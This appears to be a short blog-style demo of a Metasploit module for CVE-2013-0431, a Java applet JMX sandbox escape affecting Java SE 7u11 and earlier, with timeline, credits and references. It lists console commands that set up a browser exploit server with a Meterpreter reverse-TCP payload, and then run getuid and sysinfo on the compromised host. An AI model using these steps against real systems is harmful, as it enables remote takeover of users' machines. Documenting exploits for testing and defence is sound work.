CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Security Explorations the 2013-01-18
Vulnerability patched by the vendor the 2013-02-01
Vulnerability discovered exploited in the wild by kafeine and EKwatcher the 2013-02-18
Metasploit PoC provided the 2013-02-25

PoC provided by :

Unknown
Adam Gowdiak
SecurityObscurity
juan vazquez

Reference(s) :

CVE-2013-0431
OSVDB-89613
BID-57726
Malware don’t need Coffee
Security Explorations
Security Obscurity

Affected version(s) :

Java SE 7U11 and previous

Tested on Windows 7 Integral SP1 with :

Java SE 7U11

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Commands :

use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

14 thoughts on “CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo

Comments are closed.